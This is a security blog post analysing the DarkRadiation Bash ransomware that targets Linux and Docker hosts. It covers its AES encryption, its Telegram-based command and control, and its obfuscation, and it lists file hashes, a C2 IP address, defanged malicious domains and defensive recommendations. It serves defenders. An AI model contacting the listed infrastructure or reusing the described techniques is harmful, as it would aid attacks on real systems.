Table of Contents
December 12, 2023
|3m
How DarkRadiation Ransomware Attacks Targets Linux And Docker Instances?
Security researchers have observed new ransomware dubbed as “DarkRadiation Ransomware” written in Bash script targets Linux and Docker Instances. For file encryption, ransomware uses OpenSSL‘s AES algorithm to encrypt the files in the directory. The ransomware scripts also use the API of the messaging application Telegram for command and control (C2) communication to send an infection status to the threat actor. Let’s see how the new DarkRadiation ransomware attacks target the Linux and Docker containers in detail. http://thesecmaster.com/procedure-to-install-openssl-on-the-windows-platform/
Targets Of DarkRadiation Ransomware Attacks:
Most components of the DarkRadiation ransomware primarily target Red Hat and CentOS Linux distributions. However, researchers also found few scripts written to target Debian-based Linux distributions.
How Attackers Use DarkRadiation Ransomware Against Linux And Docker Instances?
Attackers use various open-source hacking tools to spread and infect the malware on the victims’ networks. These hacking tools contain various reconnaissance tools, bash scripts that help for lateral movement, known exploits of Red Hat and CentOS, binary injectors (libprocesshider rootkit), and more. Cybersecurity researchers also disclosed that some of the scripts are still in the development phase. The concerning fact is that antivirus engines have barely captured most of the tools used here. Research also says that the ransomware scripts are obfuscated with an open-source tool called “node-bash-obfuscate, ” a Node.js CLI tool and library to obfuscate bash scripts.
DarkRadiation ransomware uses OpenSSL‘s AES algorithm to encrypt the files on the victim machine. It encrypts either the file with specific extensions or all files in the given directory.
Once the target is infected, attackers use Telegram APIs to communicate with the worm and ransomware scripts. In other words, malware scripts use the Telegram APIs to directly access the attacker’s C2 servers. All thought, it’s not clearly known how the ransomware is delivered to the target for the first time.
Indicators Of Compromise (IOCs) Of DarkRadiation Ransomware:
File Hashes:
| Script name | Sha256 |
| supermicro_cr | d0d3743384e400568587d1bd4b768f7555cc13ad163f5b0c3ed66fdc2d29b810 |
| supermicro_bt | 652ee7b470c393c1de1dfdcd8cb834ff0dd23c93646739f1f475f71a6c138edd |
| supermicro_cr_third (obfuscated) | 9f99cf2bdf2e5dbd2ccc3c09ddcc2b4cba11a860b7e74c17a1cdea6910737b11 |
| supermicro_cr_third (deobfuscated) | 654d19620d48ff1f00a4d91566e705912d515c17d7615d0625f6b4ace80f8e3a |
| test.sh | 79aee7a4459d49dc6dfebf1a45d32ccc3769a1e5c1f231777ced3769607ba9c1 |
| downloader.sh.save | da68dc9d5571ef4729adda86f5a21d3f4478ddbae2de937f34f57f450d8a3c76 |
| downloader.sh | 3bab2947305c00df66cb4d6aaef006f10aca348c17aa2fd28e53363a08b7ec68 |
| crypt3.sh | 0243ac9f6148098de0b5f215c6e9802663284432492d29f7443a5dc36cb9aab5 |
| crypt2_first.sh | e380c4b48cec730db1e32cc6a5bea752549bf0b1fb5e7d4a20776ef4f39a8842 |
| bt_install.sh | fdd8c27495fbaa855603df4f774fe86bbc21743f59fd039f734feb07704805bd |
| binaryinject1.so | 7a15e51e5dc6a9bfe0104f731e7def854abca5154317198dad73f32e1aead740 |
| exploit4.py | c869261902a1364dd3decb2f8dce54b81621f20abd7204a427a3365c8dcc9d78 |
| exploit3.py | 503276929ce5c56c626eaa5c3aca0e0160743bf3c8d415042dc3f9bb8c8b44a2 |
| exploit1.py | 847d0057ade1d6ca0fedc5f48e76dd076fa4611deb77c490899f49701e87b6dd |
| pwd.c | 14584a716c5378405cba188dd60cec03571965329f52cfbd8c54116fa2d59377 |
C&C Server:
Malware command and control server:
185[.]141[.]25[.]168
Hack tools directory:
hxxps[://]u2wgg22a111ssy[.]space
hxxps[://]www[.]0zr33n33fo[.]space
hxxp[://]vk-o2vox-n[.]pp[.]ua
hxxps[://]m0troppm[.]site
hxxps[://]apooow4[.]space
hxxps[://]ga345ss34u[.]space
Recommendation To Protect Against DarkRadiation Ransomware Attacks:
Block all the IOCs on firewalls, web proxies, and EDR applications.
Isolate the suspected machine for further analysis.
Initiate the BCP plan.
Restore the data with clean backups.
Avoid handling files or URL links in emails, chats, or shared folders from untrusted sources.
Provide phishing awareness training to your employees/contractors.
Keep Anti-malware solutions at the endpoint and network-level updated at all times.
Deploy Endpoint Detection & Response (EDR) tools to detect the latest malware and suspicious activities on endpoints.
Thanks for reading the threat post. Please share this post with system admins and the people who use the Linux in their work and make them aware of the DarkRadiation Ransomware attacks.
You may also like these articles:
What Cado Says About the New Malicious Docker Malware Campaign?
How Can You Protect Your Linux Infrastructure From XorDdos Malware
Be Aware of This New Windows Container Malware "Siloscape" Targeting Kubernetes Clusters
How Attackers Abused Kubeflow To Run Crypto Mining Campaigns Targeting Kubernetes Clusters
Arun KL
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.
- November 20, 2024
Learn Something New with Free Email subscription
Learn Something New with Free Email subscription
Subscribe
Subscribe
Subscribe
Subscribe
- November 20, 2024
